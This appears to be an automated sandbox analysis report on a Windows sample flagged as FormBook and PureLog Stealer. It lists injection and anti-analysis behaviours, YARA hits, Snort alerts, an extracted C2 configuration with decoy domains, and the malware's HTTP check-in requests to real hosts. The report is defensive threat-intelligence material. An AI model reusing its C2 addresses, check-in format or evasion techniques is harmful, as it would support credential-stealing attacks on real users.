
Windows Analysis Report
AB2hQJZ77ipdWem.exe

Overview

General Information

Sample name: AB2hQJZ77ipdWem.exe
Analysis ID: 1476627
MD5: f640126d8e76c2a343754ff0f41c1eef
SHA1: b00e9297c74fe4847f4a0667d9cc4379409cb501
SHA256: f9e519cd66cb6bed521306afb703672ef2ed9d82d8341398c4199be4523cad96
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • AB2hQJZ77ipdWem.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe" MD5: F640126D8E76C2A343754FF0F41C1EEF)
    • AB2hQJZ77ipdWem.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe" MD5: F640126D8E76C2A343754FF0F41C1EEF)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cscript.exe (PID: 7720 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • cmd.exe (PID: 7760 cmdline: /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.gtur.top/v15n/"], "decoy": ["dyahwoahjuk.store", "toysstorm.com", "y7rak9.com", "2222233p6.shop", "betbox2341.com", "visualvarta.com", "nijssenadventures.com", "main-12.site", "leng4d.net", "kurainu.xyz", "hatesa.xyz", "culturamosaica.com", "supermallify.store", "gigboard.app", "rxforgive.com", "ameliestones.com", "kapalwin.live", "tier.credit", "sobol-ksa.com", "faredeal.online", "226b.xyz", "talktohannaford500.shop", "mxrkpkngishbdss.xyz", "mirotcg.info", "turbo3club.site", "hjnd28t010cop.cyou", "marveloustep.shop", "syedlatief.com", "comfortableleather.com", "alltradescortland.com", "dnwgt80508yoec8pzq.top", "kedai168ef.com", "gelgoodlife.com", "nxtskey.com", "milliedevine.store", "wordcraftart.fun", "mpo525.monster", "bt365851.com", "dogeversetoken.net", "boostgrowmode.com", "dacapital.net", "project21il.com", "go4stores.com", "brunoduarte.online", "sexgodmasterclass.com", "wuhey.shop", "jdginl892e.xyz", "agenkilat-official.space", "hacks.digital", "suv.xyz", "fwbsmg.life", "vicmvm649n.top", "wbahdfw.icu", "creativelyloud.com", "merrycleanteam.com", "solar-systems-panels-58747.bond", "rotaryclubofmukono.com", "bethanyumcnola.info", "breezafan.com", "ny-robotictoys.com", "lawyers-br-pt-9390663.fyi", "neurasaudi.com", "dgccb.com", "sayuri-walk.com"]}
Source | Rule | Description | Author | Strings
00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_772cc62d | unknown | unknown
  • 0xaf2:$a2: pass
  • 0xaf8:$a3: email
  • 0xaff:$a4: login
  • 0xb06:$a5: signin
  • 0xb17:$a6: persistent
  • 0xcea:$r1: C:\Users\user\AppData\Roaming\54904O77\549log.ini
00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
No Sigma rule has matched
Timestamp: 07/19/24-10:55:49.050541  SID: 2031412  Source Port: 49439  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:52:45.942774  SID: 2031412  Source Port: 49430  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:54:06.708018  SID: 2031412  Source Port: 49435  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:53:46.666794  SID: 2031412  Source Port: 49434  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:55:29.005476  SID: 2031412  Source Port: 49438  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:54:27.084313  SID: 2031412  Source Port: 49436  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:54:47.510969  SID: 2031412  Source Port: 49437  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:56:09.602206  SID: 2031412  Source Port: 49440  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:53:06.518711  SID: 2031412  Source Port: 49431  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 07/19/24-10:56:32.639578  SID: 2031412  Source Port: 49441  Destination Port: 80  Protocol: TCP  Classtype: A Network Trojan was detected
Timestamp: 2024-07-19T10:54:27.594084+0200  SID: 2031412  Source Port: 49436  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:52:03.353420+0200  SID: 2031412  Source Port: 49438  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:53:07.100331+0200  SID: 2031412  Source Port: 49431  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:52:46.453138+0200  SID: 2031412  Source Port: 49430  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:55:49.562853+0200  SID: 2031412  Source Port: 49439  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:54:07.228817+0200  SID: 2031412  Source Port: 49435  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:56:10.109951+0200  SID: 2031412  Source Port: 49440  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:52:03.353420+0200  SID: 2031412  Source Port: 49437  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:52:03.353420+0200  SID: 2031412  Source Port: 49441  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-19T10:53:47.271174+0200  SID: 2031412  Source Port: 49434  Destination Port: 80  Protocol: TCP  Classtype: Malware Command and Control Activity Detected

AV Detection

Source: AB2hQJZ77ipdWem.exe  Avira: detected
Source: http://www.kurainu.xyz/v15n/www.y7rak9.com  Avira URL Cloud: Label: malware
Source: http://www.kurainu.xyz  Avira URL Cloud: Label: malware
Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp  Malware Configuration Extractor: FormBook (C2 list www.gtur.top/v15n/ plus the decoy domain list; identical to the configuration printed above after the process tree)
Source: AB2hQJZ77ipdWem.exe  ReversingLabs: Detection: 65%
Source: Yara match  File source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample  Integrated Neural Analysis Model: Matched 100.0% probability
Source: AB2hQJZ77ipdWem.exe  Joe Sandbox ML: detected
Source: AB2hQJZ77ipdWem.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: AB2hQJZ77ipdWem.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cscript.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AB2hQJZ77ipdWem.exe, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cscript.pdb source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\cscript.exe  Code function: 5_2_00632674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,5_2_00632674

Networking

Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49430 -> 209.196.146.115:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49431 -> 91.195.240.19:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49434 -> 206.119.184.155:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49435 -> 170.39.213.118:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49436 -> 3.64.163.50:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49437 -> 3.33.130.190:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49438 -> 104.18.187.223:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49439 -> 44.227.65.245:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49440 -> 162.241.244.34:80
Source: Traffic  Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49441 -> 206.238.13.219:80
Source: C:\Windows\explorer.exe  Network Connect: 91.195.240.19 80
Source: C:\Windows\explorer.exe  Network Connect: 209.196.146.115 80
Source: Malware configuration extractor  URLs: www.gtur.top/v15n/
Source: DNS query: www.suv.xyz
Source: DNS query: www.mxrkpkngishbdss.xyz
Source: global traffic  HTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=XUieWyy5h/t2CT62Vq8i5x/kR8G+I8pB2jZaxMIrh4lgqb/JgSc0aR4As1Wt1kkrKMMr HTTP/1.1  Host: www.hacks.digital  Connection: close  Data Raw: 00 00 00 00 00 00 00  Data Ascii:
Source: global traffic  HTTP traffic detected: GET /v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX HTTP/1.1  Host: www.creativelyloud.com  Connection: close  Data Raw: 00 00 00 00 00 00 00  Data Ascii:
Source: global traffic  HTTP traffic detected: GET /v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JX HTTP/1.1  Host: www.y7rak9.com  Connection: close  Data Raw: 00 00 00 00 00 00 00  Data Ascii:
Source: global traffic  HTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J HTTP/1.1  Host: www.wordcraftart.fun  Connection: close  Data Raw: 00 00 00 00 00 00 00  Data Ascii:
Source: global traffic  HTTP traffic detected: GET /v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX HTTP/1.1  Host: www.suv.xyz  Connection: close  Data Raw: 00 00 00 00 00 00 00  Data Ascii:
Source: global traffic  HTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au HTTP/1.1  Host: www.mirotcg.info  Connection: close  Data Raw: 00 00 00 00 00 00 00  Data Ascii:
Source: Joe Sandbox View  IP Address: 3.64.163.50
Source: Joe Sandbox View  IP Address: 91.195.240.19
Source: Joe Sandbox View  ASN Name: PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY
Source: Joe Sandbox View  ASN Name: AMAZON-02US
Source: Joe Sandbox View  ASN Name: SEDO-ASDE
Source: Joe Sandbox View  ASN Name: COGECO-PEER1CA
Source: unknown  UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 identical entries)
Source: C:\Windows\explorer.exe  Code function: 4_2_10EB1F82 getaddrinfo,setsockopt,recv,4_2_10EB1F82
Source: global traffic  DNS traffic detected: DNS query: www.hacks.digital
Source: global traffic  DNS traffic detected: DNS query: www.creativelyloud.com
Source: global traffic  DNS traffic detected: DNS query: www.y7rak9.com
Source: global traffic  DNS traffic detected: DNS query: www.wordcraftart.fun
Source: global traffic  DNS traffic detected: DNS query: www.suv.xyz
Source: global traffic  DNS traffic detected: DNS query: www.mirotcg.info
Source: global traffic  DNS traffic detected: DNS query: www.mxrkpkngishbdss.xyz
Source: global traffic  DNS traffic detected: DNS query: www.lawyers-br-pt-9390663.fyi
Source: global traffic  DNS traffic detected: DNS query: www.boostgrowmode.com
Source: global traffic  DNS traffic detected: DNS query: www.syedlatief.com
Source: global traffic  DNS traffic detected: DNS query: www.gtur.top
Source: explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000002.3827556743.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.0000000009237000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000002.3822791120.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1392124977.0000000004405000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000004.00000000.1391014602.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3825259547.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1394973187.0000000007710000.00000002.00000001.00040000.00000000.sdmp  String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.boostgrowmode.com
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.boostgrowmode.com/v15n/
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.boostgrowmode.com/v15n/www.syedlatief.com
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.boostgrowmode.comReferer:
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.brunoduarte.online
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.brunoduarte.online/v15n/
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.brunoduarte.online/v15n/www.kedai168ef.com
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.brunoduarte.onlineReferer:
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.bt365851.com
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.bt365851.com/v15n/
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.bt365851.comReferer:
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.creativelyloud.com
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.creativelyloud.com/v15n/
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.creativelyloud.com/v15n/www.kurainu.xyz
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.creativelyloud.comReferer:
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.fwbsmg.life
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.fwbsmg.life/v15n/
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.fwbsmg.life/v15n/www.brunoduarte.online
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.fwbsmg.lifeReferer:
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.gtur.top
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.gtur.top/v15n/
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.gtur.top/v15n/www.fwbsmg.life
Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmp  String found in binary or memory: http://www.gtur.topReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digital
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digital/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digital/v15n/www.creativelyloud.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hacks.digitalReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.com/v15n/www.bt365851.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kedai168ef.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyz/v15n/www.y7rak9.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kurainu.xyzReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyi
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyi/v15n/
